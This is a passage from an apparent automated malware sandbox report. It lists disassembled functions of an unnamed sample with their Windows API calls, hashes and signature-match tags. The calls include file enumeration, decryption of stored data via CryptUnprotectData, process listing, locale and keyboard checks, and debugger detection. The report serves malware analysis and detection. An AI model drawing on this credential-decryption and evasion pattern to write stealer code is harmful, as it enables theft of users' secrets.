CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007E1FE7
DeleteFileA.KERNEL32(00000000), ref: 007E2071
FindNextFileA.KERNEL32(000000FF,?), ref: 007E20C7
FindClose.KERNEL32(000000FF), ref: 007E20D9

Part of subcall function 007FA557: lstrcpy.KERNEL32(00000000,?), ref: 007FA5A9
Part of subcall function 007FA557: lstrcat.KERNEL32(00000000), ref: 007FA5B9

Part of subcall function 007FA5E7: lstrlen.KERNEL32(?,0062C9F0,?,00424EAC,00420DFF), ref: 007FA5FC
Part of subcall function 007FA5E7: lstrcpy.KERNEL32(00000000), ref: 007FA63B
Part of subcall function 007FA5E7: lstrcat.KERNEL32(00000000,00000000), ref: 007FA649

Part of subcall function 007FA4D7: lstrcpy.KERNEL32(?,00420DFF), ref: 007FA53C

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID:
API String ID: 1415058207-0
Opcode ID: 243bc2c76f5be3e40c898da74a3fb51f0d2f5bb62745e84ed0b10efca5ee8d97
Instruction ID: 74a572070069b5f2c2039ad101f07315797deb97f96c38f80f9acd7d47a58a6f
Opcode Fuzzy Hash: 243bc2c76f5be3e40c898da74a3fb51f0d2f5bb62745e84ed0b10efca5ee8d97
Instruction Fuzzy Hash: 5F1211B190025CEACB19EB64CC9EEFD7338AF54300F804199B60E66191EF785B88DF56

Function 007EDEB7 Relevance: 10.9, APIs: 7, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

Part of subcall function 007FA5E7: lstrlen.KERNEL32(?,0062C9F0,?,00424EAC,00420DFF), ref: 007FA5FC
Part of subcall function 007FA5E7: lstrcpy.KERNEL32(00000000), ref: 007FA63B
Part of subcall function 007FA5E7: lstrcat.KERNEL32(00000000,00000000), ref: 007FA649

Part of subcall function 007FA4D7: lstrcpy.KERNEL32(?,00420DFF), ref: 007FA53C

FindFirstFileA.KERNEL32(00000000,?,00000000,?,00421464,00420C19), ref: 007EDF05
StrCmpCA.SHLWAPI(?,0042146C), ref: 007EDF55
StrCmpCA.SHLWAPI(?,00421470), ref: 007EDF6B
FindNextFileA.KERNEL32(000000FF,?), ref: 007EE487
FindClose.KERNEL32(000000FF), ref: 007EE499

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID:
API String ID: 2325840235-0
Opcode ID: c9279df9a95144efa02db07f43181929f95f26ab2fbdd548e666f2697a27075a
Instruction ID: 7b47eff759278a78ccf067f1b1ce0c27aa78406f189516621b96f336b261d46c
Opcode Fuzzy Hash: c9279df9a95144efa02db07f43181929f95f26ab2fbdd548e666f2697a27075a
Instruction Fuzzy Hash: B2F1E0B181026CEACB19FB64DC99EFE7338AF14300F8041D9B64E62191DF786B89DE55

Function 00417630 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

GetKeyboardLayoutList.USER32(00000000,00000000,0042059F), ref: 00417681
LocalAlloc.KERNEL32(00000040,?), ref: 00417699
GetKeyboardLayoutList.USER32(?,00000000), ref: 004176AD
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417702
LocalFree.KERNEL32(00000000), ref: 004177C2

Strings

/ , xrefs: 0041771F

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 60f459b21bc8fd4d4d86911808f4b25552e0fe97f376acc6722a8a3d7c5d5934
Instruction ID: c1db32f68e501b8527b0747275b78d72b64e7f1ab46943026d097e8974929a8d
Opcode Fuzzy Hash: 60f459b21bc8fd4d4d86911808f4b25552e0fe97f376acc6722a8a3d7c5d5934
Instruction Fuzzy Hash: 49418F71941118ABCB24DF94DC89FEEB374FB54314F2041DAE40A62191DB782F85CFA5

Function 007EC8C7 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 007EC8FA
lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 007EC918
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 007EC923
memcpy.MSVCRT ref: 007EC9B9
lstrcat.KERNEL32(?,00420B2E), ref: 007EC9EA
lstrcat.KERNEL32(?,00420B2F), ref: 007EC9FE
lstrcat.KERNEL32(?,00420B33), ref: 007ECA1F

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
Opcode ID: ddbd86f9eda5f4e9edc3264145e69acf7d8965538d2becbbe7f1df724c034ec2
Instruction ID: 5a6b1b0062579c091e8f5d117ac832a65176389216075c35400a548187a7b4a2
Opcode Fuzzy Hash: ddbd86f9eda5f4e9edc3264145e69acf7d8965538d2becbbe7f1df724c034ec2
Instruction Fuzzy Hash: B5415F7490421EDFCB20CF90DC89BFEBBB9BB48304F1081A9E509A7280D7746A85CF95

Function 0040C660 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040C693
lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,0084D470), ref: 0040C6B1
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C6BC
memcpy.MSVCRT ref: 0040C752
lstrcat.KERNEL32(?,00420B2E), ref: 0040C783
lstrcat.KERNEL32(?,00420B2F), ref: 0040C797
lstrcat.KERNEL32(?,00420B33), ref: 0040C7B8

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
Opcode ID: cbad7c0847f5c4f1099e9d5384a001de016509e2d4f22c5d3e1b4949098894a2
Instruction ID: c0f5229a5aee9ff77f702815419eeee9532eb5a68af55b4089f36d1ae8d19eeb
Opcode Fuzzy Hash: cbad7c0847f5c4f1099e9d5384a001de016509e2d4f22c5d3e1b4949098894a2
Instruction Fuzzy Hash: 96414E7490421ADFCB20CFA4DD89BEEBBB9AB48304F1042B9F509A7280D7745A85CF95

Function 007F8BA7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,;T~,40000001,00000000,00000000), ref: 007F8BC7

Strings

;T~, xrefs: 007F8BBF, 007F8C1B, 007F8BC2, 007F8C1E

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID: ;T~
API String ID: 80407269-3189053192
Opcode ID: 3aec6097f2b6cc18e3a50b756b1644abdcd7f84ae5ce4698d77b00bdd9d6955c
Instruction ID: 555ee9c33b6d68f26c526703b38ee2da134cf529b32371d3ada237caf6ed87b7
Opcode Fuzzy Hash: 3aec6097f2b6cc18e3a50b756b1644abdcd7f84ae5ce4698d77b00bdd9d6955c
Instruction Fuzzy Hash: F611F5B0204608AFDB54CF64D884FBA37A9AF89350F109598FA098B350DB79E842DB61

Function 00409B10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 00409B3F
LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 00409B51
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 00409B7A
LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 00409B8F

Strings

>O@, xrefs: 00409B24, 00409B31, 00409B49, 00409B68, 00409B34, 00409B6B

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: >O@
API String ID: 4291131564-3498640338
Opcode ID: 51d6155b46c97a52efa385d52040a93a20dc9faff1265f51667d84e9c93c90dd
Instruction ID: 421755d6b48e33095a5169d11db47f4caeee54bd02e7bdd1b67a963d2e3b7d6d
Opcode Fuzzy Hash: 51d6155b46c97a52efa385d52040a93a20dc9faff1265f51667d84e9c93c90dd
Instruction Fuzzy Hash: 7F11C074240308AFEB10CF64CC95FAA77B6FB89710F208059F9199B3D0C7B5A942CB54

Function 007F7897 Relevance: 7.6, APIs: 5, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

GetKeyboardLayoutList.USER32(00000000,00000000,0042059F), ref: 007F78E8
LocalAlloc.KERNEL32(00000040,?), ref: 007F7900
GetKeyboardLayoutList.USER32(?,00000000), ref: 007F7914
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 007F7969
LocalFree.KERNEL32(00000000), ref: 007F7A29

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID:
API String ID: 3090951853-0
Opcode ID: 56a702683d9c0adffbdd7c2d6bdd836b84ceec4e3143d7fb4e0c96aef427dc1f
Instruction ID: c864ddae02da0afade092f69da53ff196285ca7c8619d8a451ff733deddd0f0e
Opcode Fuzzy Hash: 56a702683d9c0adffbdd7c2d6bdd836b84ceec4e3143d7fb4e0c96aef427dc1f
Instruction Fuzzy Hash: A34138B194022CEBCB24DB94DC9DFFDB374AB54300F204199E209A6291DB786F85CF55

Function 007FAF61 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 007FB7C9
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 007FB7DE
UnhandledExceptionFilter.KERNEL32(0041F298), ref: 007FB7E9
GetCurrentProcess.KERNEL32(C0000409), ref: 007FB805
TerminateProcess.KERNEL32(00000000), ref: 007FB80C

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: f83f28cb76d01a588ba20aedf737648f300cf2348463cefc92e4954df8d9d801
Instruction ID: e1009e61969218cbe66944a9d73dcdd68e128f2fa719790406758c2dc6a7ce05
Opcode Fuzzy Hash: f83f28cb76d01a588ba20aedf737648f300cf2348463cefc92e4954df8d9d801
Instruction Fuzzy Hash: 2421C3B8600214EFD724EF15F9E56697BA4BB48304F90403AE908D7361D7B4A586CF59

Function 0041ACFA Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0041B562
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041B577
UnhandledExceptionFilter.KERNEL32(0041F298), ref: 0041B582
GetCurrentProcess.KERNEL32(C0000409), ref: 0041B59E
TerminateProcess.KERNEL32(00000000), ref: 0041B5A5

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: f83f28cb76d01a588ba20aedf737648f300cf2348463cefc92e4954df8d9d801
Instruction ID: e298f46f0b3396334d2e2e37c4a67069ca1d3d313a6b9180192500d6cd60c5fb
Opcode Fuzzy Hash: f83f28cb76d01a588ba20aedf737648f300cf2348463cefc92e4954df8d9d801
Instruction Fuzzy Hash: 2F21D678600214DFD720EF59F9D4AA97BB5FB08314F90803AE809D7261E7B46586CF9D

Function 007E74E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 007E74F4
RtlAllocateHeap.NTDLL(00000000), ref: 007E74FB
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 007E7528
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 007E754B
LocalFree.KERNEL32(?), ref: 007E7555

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: 5915e9d016c50e8c8afbc1db5a49932ad24ad0ff49fd5d82b8f52955bd254427
Instruction ID: c079b0e84e2f23b534e4c31e00df36c90e49a7cc64eec7bf0e81ce4f126a5103
Opcode Fuzzy Hash: 5915e9d016c50e8c8afbc1db5a49932ad24ad0ff49fd5d82b8f52955bd254427
Instruction Fuzzy Hash: 0B010075A40208BBDB14DFD4DD46F9D7779AB48B04F208144FB05AB2D0D6B0AA01CB68

Function 00407280 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407CD0,80000001,00415CA4,?,?,?,?,?,00407CD0), ref: 0040728D
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407CD0,80000001,00415CA4,?,?,?,?,?,00407CD0,?), ref: 00407294
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004072C1
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407CD0,80000001,00415CA4), ref: 004072E4
LocalFree.KERNEL32(?,?,?,?,?,?,00407CD0,80000001,00415CA4,?,?,?,?,?,00407CD0,?), ref: 004072EE

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 3657800372-0
Opcode ID: 5915e9d016c50e8c8afbc1db5a49932ad24ad0ff49fd5d82b8f52955bd254427
Instruction ID: 878b0d7115cd8d43870734417daae2c605d8a0a5a409213b4f7418bdd2279ebf
Opcode Fuzzy Hash: 5915e9d016c50e8c8afbc1db5a49932ad24ad0ff49fd5d82b8f52955bd254427
Instruction Fuzzy Hash: 31014071A40208BBDB10DF94CC46F9E7779BB44700F204055FB05BB2D0D6B0AA019BA9

Function 007F9307 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007F9325
Process32First.KERNEL32(00420AB3,00000128), ref: 007F9339
Process32Next.KERNEL32(00420AB3,00000128), ref: 007F934E
StrCmpCA.SHLWAPI(?,00000000), ref: 007F9363
CloseHandle.KERNEL32(00420AB3), ref: 007F9381

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 53cc5b1a25e9de08871f2f161f83c20120fe0a383d746f94447c3d4f9de0246b
Instruction ID: fa42d289c59040c3c81beec85cbcce91ccd7dd29fa8d554c94c4a9501c1e3861
Opcode Fuzzy Hash: 53cc5b1a25e9de08871f2f161f83c20120fe0a383d746f94447c3d4f9de0246b
Instruction Fuzzy Hash: A6010C75A14208EBCB20DFA4CD94BEDBBF9AF48700F104198A60A97290DB749B45DF51

Function 004190A0 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004190BE
Process32First.KERNEL32(00420AB3,00000128), ref: 004190D2
Process32Next.KERNEL32(00420AB3,00000128), ref: 004190E7
StrCmpCA.SHLWAPI(?,00000000), ref: 004190FC
CloseHandle.KERNEL32(00420AB3), ref: 0041911A

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 53cc5b1a25e9de08871f2f161f83c20120fe0a383d746f94447c3d4f9de0246b
Instruction ID: 54ad55f7a4b81502d496241441e07260b80a378e6eebdd4a9cd1ea64267145a6
Opcode Fuzzy Hash: 53cc5b1a25e9de08871f2f161f83c20120fe0a383d746f94447c3d4f9de0246b
Instruction Fuzzy Hash: 1E010875A00208FBDB20DFA4CD99BEEBBF9AF08700F104199E909A7250DB749E85DF55

Function 00418940 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000), ref: 00418960

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 3aec6097f2b6cc18e3a50b756b1644abdcd7f84ae5ce4698d77b00bdd9d6955c
Instruction ID: 8551c2f8eff3d936ade43cc3e5b46360b1bd8edc09fa8c17659182bc6519fa86
Opcode Fuzzy Hash: 3aec6097f2b6cc18e3a50b756b1644abdcd7f84ae5ce4698d77b00bdd9d6955c
Instruction Fuzzy Hash: DF1118B5220209FFDB14CF54D884FBB37A9AF99314F109549F9098B250DB79EC82CB69

Function 007E9D77 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,007E51A5,00000000,00000000), ref: 007E9DA6
LocalAlloc.KERNEL32(00000040,?,?,?,007E51A5,00000000,?), ref: 007E9DB8
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,007E51A5,00000000,00000000), ref: 007E9DE1
LocalFree.KERNEL32(?,?,?,?,007E51A5,00000000,?), ref: 007E9DF6

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 51d6155b46c97a52efa385d52040a93a20dc9faff1265f51667d84e9c93c90dd
Instruction ID: 970362372d270ca78d80942e018f2893c17b2cfb6bede31eb9152502dfeb7572
Opcode Fuzzy Hash: 51d6155b46c97a52efa385d52040a93a20dc9faff1265f51667d84e9c93c90dd
Instruction Fuzzy Hash: 8C119075641308AFEB10CF64CC95FAA77B6EB89714F208058FE199F290C7B6A941CB94

Function 007E9E17 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 007E9E3B
LocalAlloc.KERNEL32(00000040,00000000), ref: 007E9E5A
memcpy.MSVCRT ref: 007E9E7D
LocalFree.KERNEL32(?), ref: 007E9E8A

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: 7bf331572f1629f969e766ff9da9bf80e1d95d1acc3dba2254ec725ed3047747
Instruction ID: 843f46190e5e22f332c51cef928d705729f2df22f4a63cdb75fd4a2785322ed5
Opcode Fuzzy Hash: 7bf331572f1629f969e766ff9da9bf80e1d95d1acc3dba2254ec725ed3047747
Instruction Fuzzy Hash: 3011E8B9A00209DFCB04CF94D984AAEB7B5FF88300F108558E91597350D730AE11CFA1

Function 00409BB0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409BD4
LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BF3
memcpy.MSVCRT ref: 00409C16
LocalFree.KERNEL32(?), ref: 00409C23

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: 7bf331572f1629f969e766ff9da9bf80e1d95d1acc3dba2254ec725ed3047747
Instruction ID: 89a0ba0d6d0461e137ce63e6e87bc55d2f461512d11096c1476870e855060961
Opcode Fuzzy Hash: 7bf331572f1629f969e766ff9da9bf80e1d95d1acc3dba2254ec725ed3047747
Instruction Fuzzy Hash: 7111E8B8A00209DFCB04DF94D984AAEB7B6FF88300F108569E915A7390D730AE51CF65

Function 004174D0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0087B4B0,00000000,?,00420DE0,00000000,?,00000000,00000000), ref: 00417503
HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,0087B4B0,00000000,?,00420DE0,00000000,?,00000000,00000000,?), ref: 0041750A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0087B4B0,00000000,?,00420DE0,00000000,?,00000000,00000000,?), ref: 0041751D
wsprintfA.USER32 ref: 00417557

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: ebf191636fdab90f45f19ccd6af6600c11bec1d160f4b14778d2533b0a03f9df
Instruction ID: e353cc71a305f1a8f1a8746e49c408d3a80ec80c51124973b3d8e1cf6413b4f4
Opcode Fuzzy Hash: ebf191636fdab90f45f19ccd6af6600c11bec1d160f4b14778d2533b0a03f9df
Instruction Fuzzy Hash: 4111E1B1E05618EBEB20CF54DC45FA9B779FB00720F10039AF50A932D0C7785A85CB55

Function 007FCBC3 Relevance: 129.2, APIs: 86, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 007FCBD7
??3@YAXPAX@Z.MSVCRT ref: 007FCBDF
??3@YAXPAX@Z.MSVCRT ref: 007FCBE7
